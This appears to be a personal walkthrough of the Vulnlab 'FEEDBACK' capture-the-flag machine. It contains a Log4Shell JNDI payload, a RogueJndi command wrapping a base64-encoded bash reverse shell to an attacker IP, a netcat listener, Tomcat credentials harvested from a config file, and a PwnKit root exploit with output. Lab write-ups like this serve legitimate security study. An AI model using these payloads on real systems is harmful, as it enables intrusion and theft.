Here are my notes on the FEEDBACK box from Vulnlab.
FEEDBACK: 10.10.77.246
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http Apache Tomcat 9.0.56
|_http-title: Apache Tomcat/9.0.56
|_http-favicon: Apache Tomcat
/host-manager, /manager and Server Status all answer 403 Access Denied (no creds yet).
/examples and /docs: nothing useful, BIG NOPE !
/feedback is the most interesting one.
http://10.10.77.246:8080/feedback/
Source page of /feedback:
<!-- Build with Java, Struts2 & Log4J -->
Apache Log4j exploit (Log4Shell, CVE-2021-44228: a ${jndi:...} string in any logged field triggers a JNDI lookup) ?
Apache Log4J exploit example: #FEEDBACK-VL
java -jar target/RogueJndi-1.1.jar --command "whoami" --hostname 10.8.0.71
${jndi:ldap://10.8.0.71:1389/o=tomcat} - WORKS !
Submit it in every input field of the /feedback form; each field is logged, so whichever one Log4j interpolates fires the lookup.
echo 'bash -c bash -i >&/dev/tcp/10.8.0.71/1234 0>&1' | base64
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuOC4wLjcxLzEyMzQgMD4mMQo=}|{base64,-d}|{bash,-i}" --hostname "10.8.0.71"
The {echo,...}|{base64,-d}|{bash,-i} form keeps the command free of spaces: Java's Runtime.exec(String) tokenizes on whitespace, so the real one-liner travels inside the base64 blob.
┌──(root㉿kali)-[/home/kali/VL/FEEDBACK]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.77.246] 59500
whoami
tomcat
hostname
ip-10-10-10-7
id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
USER-SHELL !
PRIV ESC:
python3 -c 'import pty; pty.spawn("/bin/bash")'
tomcat@ip-10-10-10-7:~/conf$ pwd
pwd
/opt/tomcat/conf
tomcat@ip-10-10-10-7:~/conf$ tail tomcat-users.xml
tail tomcat-users.xml
limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<user username="admin" password="H2RR3rGDrbAnPxWa" roles="manager-gui"/>
<user username="robot" password="H2RR3rGDrbAnPxWa" roles="manager-script"/>
</tomcat-users>
Tomcat manager creds (admin = manager-gui, robot = manager-script, same password). Not needed for root below, but an alternative path via the manager.
tomcat@ip-10-10-10-7:/tmp$ python3 CVE-2021-4034.py
python3 CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# whoami
whoami
root
# id
id
uid=0(root) gid=1001(tomcat) groups=1001(tomcat)
-Vulnerable to CVE-2021-4034 (PwnKit, SUID pkexec) !
-ROOT SHELL !
# pwd
pwd
/root
# cat root.txt
cat root.txt
VL{REDACTED}
ROOT.TXT: VL{REDACTED}
